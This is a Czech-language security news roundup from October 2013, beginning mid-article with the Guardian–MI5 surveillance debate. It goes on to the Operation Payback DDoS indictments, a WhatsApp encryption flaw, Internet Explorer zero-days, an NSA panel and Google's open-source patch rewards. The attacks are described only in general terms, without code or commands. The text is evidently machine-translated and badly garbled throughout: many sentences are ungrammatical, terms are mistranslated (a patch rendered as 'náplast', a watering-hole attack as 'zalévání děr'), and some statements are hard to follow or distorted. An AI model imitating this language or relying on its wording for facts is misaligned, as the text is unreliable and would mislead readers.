Rusbridger si myslí, že lidé z bezpečnosti nikdy o debatu nestáli a chtěli by v tajnosti držet vše. „Nechcete, aby o tom psal tisk nebo kdokoliv jiný. Ale MI5 nemůže být v této debatě jediným hlasem.“ Rusbridger také dodal, že Guardian odhalil „rozsah, v jakém je celá populace potenciálně pod dohledem.“
Na Parkerovy obavy, že zveřejnění tajných informací pomáhá teroristům, Rusbridger odpověděl: „To budou říkat všichni. Když se podíváte na dějiny výzvědných služeb, zjistíte, že to samé říkali už v roce 1990.“
Nezávislý člen parlamentu Patrick Mercer míní, že by data zveřejněna být neměla, pokud by to narušilo bezpečnost veřejnosti. „Pokud je ohrožena bezpečnost odhalením příliš mnoha informací, je to chyba. Jen si představte, že bychom odhalili všechna tajemství kolem Enigmy během druhé světové války. Veřejnost by to sice zajímalo, ale válku bychom prohráli.“
Několik IT pracovníci mezi "Operation Payback" obviněných
10.10.2013 Kriminalita | Bezpečnost
Poslední várka Anonymní hacktivists, kteří se zúčastnili v roce 2010 Operation Payback proti autorských organizací, advokátních kanceláří a amerických politiků a finančních a e-platby organizacím, byl obviněn minulý týden ve Virginii. Třináct muži stojí obviněn z toho, že organizoval a účastnil - spolu s dalšími členy Anonymous - v koordinované sérii útoků (DDoS), ve kterých Asociace nahrávacího průmyslu Ameriky (RIAA), Motion Picture Association of America (MPAA), Spojené státy Copyright Office of theLibrary Kongresu, Visa, MasterCard, Bank of America, Amazon, a mnoho dalších, a po použití a distribuované stresové testování / DDoS programu známého jako Low Orbit Ion Cannon. Jedná se o to první obvinění vznesené proti Anonymní členové, kteří se účastnili této operace, ale podle The Verge , tato obvinění ukázat trochu více možností, pokud jde o věk a povolání, vzpírá dlouhodobé image Anonymní hackeři jako dospívající se nic lepšího na práci. pravda, že většina obviněných jsou v jejich 20s, ale dva z nich - Geoffrey Kenneth velitel a Dennis Owen Collins - jsou 65 a 53, resp. 28-rok-starý Phillip Simpson pracuje od roku 2009 jako správce systému v různých společnostech a University of Arizona a je v současné době pracuje na přezkumu advokátské zkoušky služby. 22-letý Anthony Tadros je ještě student, ale také pracoval jako bezpečnostní analytik pro univerzitu navštěvuje. A konečně, 27-letý Ryan Gubele zřejmě pracoval pro řadu známých firem - včetně Amazon - jako sysadmin, technická podpora systémů technik, a tak dále. současné době je zaměstnán na Twitteru jako inženýr webu spolehlivosti a podle obžaloby, on byl ten, kdo byl dohlížet na účinnost útoku DDoS proti MPAA stránky a vydalo varování, kdy byl pozemek přestěhovali na jinou IP adresu. On také přistupovat RIAA síťových zdrojů. Když navázal Greg Sandoval, Gubele a Simpson odmítl vyjádřit k obžalobě a Tadros prostě řekl, že to bylo v jeho nejlepším zájmu, není odpovědět na všechny otázky týkající se jeho situace, když je případ probíhá
WhatsApp šifrování chyba ukázalo, POC zveřejněny kód
10.10.2013 Zranitelnosti | Zabezpečení
Holandský výzkumník říká, že řešení pro šifrování provádí populární multiplatformní IM služby WhatsApp je vadný. Tvrdí, že společnost nemyslel to tak dobře, jak by měl, a že uživatelé by si měli uvědomit, že jejich WhatsApp zprávy by mohly být snadno dešifrovat útočníky. WhatsApp má svůj spravedlivý podíl problémů Ochrana osobních údajů a společnost zavedla zprávu Šifrování v srpnu 2012, ale nebyla specifikována, co šifrovací metoda je použita. Nyní, díky Thijs Alkemade, informatika a matematika student na univerzitě v Utrechtu a Lead Developer pro Adium, open-source IM klienta pro Mac OS X, víme, že Nejenže WhatsApp používat stejný (RC4) šifrovací klíč pro zprávy v obou směrech, ale také stejný HMAC klíč pro ověření zprávy. "Ale MAC samo o sobě nestačí k odhalení všech forem manipulace: útočník mohl klesnout specifické zprávy, které je swap, nebo dokonce přenášet je zpět odesílateli, "řekl poukazuje . TLS pulty tím, že včetně pořadové číslo ve formátu prostého textu každé zprávy a pomocí jiného klíče pro HMAC pro zprávy ze serveru na klienta a zpráv od klienta k serveru. WhatsApp nepoužívá takový čítač sekvencí, a to opakovaně klíč použitý pro RC4 pro HMAC. " Aby jí dokázal svou pravdu, on také vytvořil skript v Pythonu, který může zachytit zprávy WhatsApp a která se snaží dešifrovat příchozí zprávy hádat vłechna odchozí zprávy. Když po reprodukovat výsledky s úřední client WhatsApp, on pokračoval s výzkumem a prokázaly , že oficiální Android a Nokia S60 klienti jsou tak zranitelné. "Měli byste předpokládat, že každý, kdo je schopen odposlouchávat vaše připojení WhatsApp je schopen dešifrování zpráv, daný dost úsilí. Měli byste zvážit všechny své předchozí WhatsApp ohrožena rozhovory, "dodal s tím, že WhatsApp uživatelé nemohou dělat nic, aby se ochránili - kromě přestat používat aplikace, dokud nebude možné aktualizovat odstranit nedostatky. Zdá se, že řešení je jednoduché: Vývojáři by měli zvážit použití "řešení, která byla přezkoumána, aktualizována a stanoveny pro více než 15 let, jako TLS."
Neočekávaný IE Zero Day užívaných v bankovnictví, hry Útoky
10.10.2013 Zranitelnosti | Hacking | Bezpečnost
Jednalo se o dva-pro-jeden obchod, který správcům systému Windows mohl udělat bez.
Již očekával jednu náplast Internet Explorer zero-day aktivně využívány, správci dostali opravy pro dva nula dní místo dnes jako součást října 2013 Microsoft aktualizace Patch Tuesday zabezpečení.
Druhý překvapivě, zejména organizace již kymácející se ve větru bez náplasti po dobu jednoho IE chyby použitého v aktivních útoků, a pro které Metasploit exploitu byl k dispozici. Bonus oprava byla pro nepříbuzného chyby ve volné přírodě na blízko měsíčně a také zaměření organizace v Japonsku a Koreji, podobně jako první den nula.
Vědci z Národního Cyber bezpečnostního střediska v Nizozemsku, IOprotect GmbH a Trustwave SpiderLabs byly připsány v poradenských společností Microsoft za oznámení chyby zabezpečení. SpiderLabs "ředitel bezpečnostního výzkumu Ziv Mador řekl Threatpost společnosti výzkumníci byli sledování útoku server, který měl ještě před dvěma týdny byla slouží využije pro záplatami zranitelností pouze. To se změnilo na 12 září, Mador řekl, když provozují IE 8 probublává na povrch, že jeho vědci předtím neviděl.
"To se používá k distribuci malwaru obecný," řekl Mador. "Na rozdíl od předchozího nulové den v IE, tohle distribuuje malware krást přihlašovací údaje z online hráčů, nebo přerušit přístup na stránky bank. Je to obecně malware, ne cílené útoky. "
Dříve hlášeny IE nula den byly použity ve velmi cílené útoky proti japonským mediálních společností. Mediální stránky byly ohroženy jako součást útoku zalévání děr a sloužili využije, podle výzkumníků na FireEye, zaměřených na vládu, high-tech a výrobních organizací v Japonsku. FireEye nazval rozsáhlý shromažďování informací operace.
Microsoft se pustil Fix-It nástroj jako dočasný zmírnění na odhalení, že útoky byly v divočině. Minulý pátek byl exploit Metasploit modul přidá do nástrojů, stupňovat možnost, že rozšířenější útoků by mohla být na spadnutí.
Druhý den nula cílené uživatele v Japonsku a Koreji přes drive-by download. Jeden rys je jeho schopnost identifikovat jazyk infikovaný počítač byl nakonfigurován tak, aby. Pokud ani Japonec Korejský ani by IE přesměrovat na Google a útok by byla ukončena, Trustwave řekl blogpost.
Nicméně, pokud se ověřuje jazyka a IE 8, útok používá ROP řetězy obejít ochranu nativní paměti na Windows, jako je DEP a ASLR.
Útok náklad obsahuje ne méně než 10 řidičů, spustitelné soubory a DLL klesl na oběti stroj, Trustwave řekl. Pokusí se zakázat řadu bezpečnostních produktů na počítači, přesměrování bankovní weby k útočníkovi kontrolované oblasti a také komponenty, které se snaží ukrást herní pověření.
"Exploit není triviální a tyto typy využije často nejsou triviální. Vyžadují řadu velmi kreativních kombinací do práce, "řekl Mador. "To byl ten případ."
Kromě ROP řetězců, útok také používá element modelu DOM vlastností Spray techniky používané v jiných IE nula den opravenou včera.
"Existuje milion způsobů, jak rozvíjet HTML stránky nebo webové aplikace, tolik atributů, tagy, skripty. Lidé, kteří vyvíjejí prohlížeče budou muset vypořádat s obrovským množstvím možných scénářů, "Mador řekl a ukázal na množství přírodních míst, kde zranitelná kód by mohl skrývat v parsování a vykreslování některé z těchto složek.
"Když se podíváme na kód zneužití je pro prohlížeče zranitelnosti, často používají podivné kombinace z hlediska HTML, které nedávají smysl," řekl Mador. "Nezdá se, že ukázat něco zajímavého, ale účel kombinací je vyvolat nějakou chybu zabezpečení v kódu syntaktické analýzy nebo správu paměti."
Patch byl součástí kumulativní aktualizace pro IE řešena v MS13-080 , tj. byla oprava téměř každý měsíc v roce 2013, včetně mimo pásmo náplasti na začátku tohoto roku.
technologové Zkoumat Vliv úřadu NSA na hospodářství, důvěra
10.10.2013 Šifrování | Bezpečnost
Pokud hledáte pro stříbrné obložení mezi Snowdena netěsnosti a šíři činností dozoru NSA, je lze nalézt ve dvou věcech: 1) matematika dodržování technologie šifrování je, pokud víme, pevná a 2) Tor zřejmě řídí špionážní agenturu USA praštěný.
"Divím se, že," řekl Matt Blaze, cryptographer a profesor na University of Pennsylvania, "na to, jak málo z tajemství NSA se vztahují k tomu, jak prolomit šifrování."
Kromě toho a nedávné odhalení, že NSA měl poměrně málo jedinců, kteří komunikují sledování úspěšnosti a přesunout on-line pomocí sítě Tor, bude se týče vytvoření přísně tajné interní prezentace s názvem "Tor smrdí", tam není Zdá se, že mnoho dělat technologové úsměv v těchto dnech.
Blaze byl jedním z pěti odborníků na technologii panelu středu během celodenního programu Cato Institute v oblasti dozoru NSA. Panel, který zahrnoval Karen Reilly Projektu Tor, David Dahl z SpiderOak, Jim Burrows Silent Circle a Chris Soghoian z ACLU, obsazení technickou kontrolu o činnosti NSA a její dopad na důvěru v technologie a internetu schopnost bezpečně podporovat komunikaci a elektronického obchodování.
Senátor Ron Wyden, D-Oregon, porazit ekonomickou buben brzy ráno s vášnivou keynote bubnování podporu pro svůj dvoustranný zákona doufá, že skončí hromadný sběr Američanů telefonní záznamy NBÚ, stejně jako přinést sledování reformy. Wyden rovněž poukázal na to, že on měl rozhovory s hlavními obchodními vůdci obávají ekonomických dopadů údajné podvracení NSA bezpečnostních technologií a vztahů to má s velkými telekomunikační a internetové společnosti z hlediska dlouhodobého přístupu k zákaznických dat.
"Politici, kteří se zaregistrují sleva na příliš široké programů dozoru by měly být uvažování o dopadu na amerických pracovních místech, a důvěru," řekl Wyden. "Důvěra je tak důležité pro americké firmy, aby po celém světě. Nemají tuto důvěru osmózou, ale to bylo vydělal v průběhu let prostřednictvím pevných obchodních praktik. "
Soghoian zdůraznil, že společnosti jako SpiderOak, který poskytuje bezpečné zálohování služby a Silent Circle, který poskytuje bezpečné telefonní služby, jsou v jedinečné pozici, protože jsou rozděleny podle funkcí zabezpečení a ochrany osobních údajů ve svých produktech. Silent Circle nedávno okenice svou e-mailovou službu, spíše než někdy být nucen předat údaje o zákaznících na vládu, jeho rozhodnutí přišlo v patách rozhodnutí Lavabit je uzavřít své brány. Lavabit byl bezpečný e-mailových služeb, stejně, to bylo používáno Edward Snowdena, a spíše než zase přes soukromé klíče pro dešifrování oznamovatele je e-maily, se rozhodla ukončit své dveře trvale.
"Spojené státy jsou lídrem v oblasti malé a střední podniky, které poskytují bezpečné komunikační služby," řekl Soghoian. "Když americká vláda nutí k Lavabit dodržovat, je to rozsudek smrti. Dodržujte, a vaše reputace je zničena. Bezpečné komunikační služby jsou v ohrožení. Měli bychom chtít tuto část ekonomiky k růstu. "
NSA je obviněn z podvracení šifrovacích standardů, injektáže se do vývoje těchto norem zúčastněných a přispívajících do Národního institutu pro standardy a technologie (NIST) a oslabení standardů úmyslně, nebo jít tak daleko, že injekci zadní vrátka, aby se přístup komunikace později. To také byl obviněn obdobné činnosti s bezpečnostním software a hardware, výsadba zadní vrátka do kódu a hardware s cílem udržet trvalý přístup a dohledu volný přístup do těchto produktů.
Soghoian prosil novináře, s přístupem k Snowdena dokumentů odhalit tajemství, které byly dosud upravenou, pravděpodobně provedeno ve spolupráci s vládou.
"Věci, které musíte vidět, jsou zdroje novináři musíte mít tajné názvy algoritmů, které byly rozvráceny. Názvy společností NSA rozvrátil a sabotoval produkty, "řekl Soghoian. "Musíme to vědět na ochranu veřejnosti."
Soghoian řekl přísně tajné slide prezentace vydané veřejnosti Guardian redigován jména dvou výrobců čipů VPN, které byly backdoored NBÚ a GCHQ.
"Chceme vědět, jaké jsou backdoored s cílem chránit lidi," řekl Soghoian. "To jsou věci, novináři mají pocit, že musí chránit."
Tor, zatím je ve stoje jako spolehlivém médiu. Být open source, Reilly uvedl, nutí uživatele důvěřovat kódu spíše než lidi za to. Zdůraznila, že předpoklad, za jak Tor funguje zvuk zůstává i přes mírné úspěchu NSA odhalil, že měl při sledování malého počtu uživatelů.
"Budeme přidávat další šifrování mezi relé brzy, ale jsem si jistý, že distribuované trust model bude nadále pracovat a být přijat s dalšími technologiemi," řekl Reilly.
Burrows, mezitím řekl, že vzal velkou radost do bojů NSA se Tor.
"Ano, mají metody pro získání na některé lidi občas, ale i oni říkají Tor funguje a je to zvedl," řekl Burrows. "A to je to zvedl na ně mě potěšilo víc než cokoli jiného."
Google platit odměny záplat na open source projektů
10.10.2013 Zranitelnosti | Bezpečnost
Google, jeden z prvních společností, které nabízejí významné chyby nájemný programu , rozšiřuje své odměny výzkumných a vývojových pracovníků, kteří se podílejí záplaty různých open-source projektů a mají vliv na bezpečnost projektu.
Nové odměny budou pohybovat od $ 500 až $ 3,133.70, a jsou výsledkem společnosti hledají nové způsoby, jak zlepšit bezpečnost svých klíčové součásti, jako je Chrome OS a prohlížeč Chrome. Google má zranitelnosti věrnostní program pro ty nabídky již několik let, a přilákaly velké množství příspěvků. Poznámky k vydání nových verzí Chrome, například, často úvěr litanie externí badatele k předkládání chyb. Odměny jsou často na $ 1000 až 3000 dolar rozsahu, ale může vyletět do desítek tisíc za zvlášť závažných chyb.
Ale rozšíření programu je důkazem toho, jak těžké to může být zabezpečených aplikací, zejména open source projekty, které se spoléhají na kódu z různých zdrojů. Takže Google bude nyní platit vývojářům odměny pro zlepšení bezpečnosti vztahující se k věci, jako OpenSSL, OpenSSH a svázat.
"Ať už chcete přejít na bezpečnější alokátoru, přidat oddělení výsady, uklidit spoustu povrchní volání strcat (), nebo i jen k tomu, aby ASLR - chceme pomoci!" Michal Zalewski týmu Google bezpečnosti uvedl v blogu .
"Máme v úmyslu zavést program postupně, na základě kvality obdržených podání a zpětná vazba od komunity vývojářů."
Komponenty, které jsou součástí programu, v počáteční fázi jsou:
Základní služby síťové infrastruktury: OpenSSH, BIND, ISC DHCP
Základní infrastruktura analyzátory obrazu: libjpeg libjpeg-turbo, libpng, giflib
Open-source základy Google Chrome: chrom, Blink
Ostatní velkým dopadem knihovny OpenSSL, zlib:
Security-kritické, běžně používané komponenty jádra systému Linux (včetně KVM)
Za účelem získání nároku na odměnu od Google, oprava podání od developera musí mít prokazatelný ", významné a proaktivní dopad na bezpečnost" daného komponentu. Program se vztahuje i na vývojáře, kteří pracují na projektech i externí vývojáře, kteří prostě vidí problém, že chcete pomoci opravit. Chcete-li nárok na odměnu, předložený náplast je vlastně loď.
Kromě odměnu až do výše $ 3,133.7 Google může zaplatit vyšší odměny pro opravdu chytré podání.
"Můžeme zvolit vyšší odměny za neobvykle chytrý nebo komplexní podání, můžeme také rozdělit odměnu mezi zadavatelem a správcům projektu v případech, kdy oprava vyžaduje značné další úsilí jménem vývojového týmu," jsou pravidla pro Program říct.
Vývojáři předložit své záplaty přímo správci daného projektu, a jakmile se náplast ve skutečnosti je dodáván jako součást projektu, jednoduše pošlete email na Google s detaily.
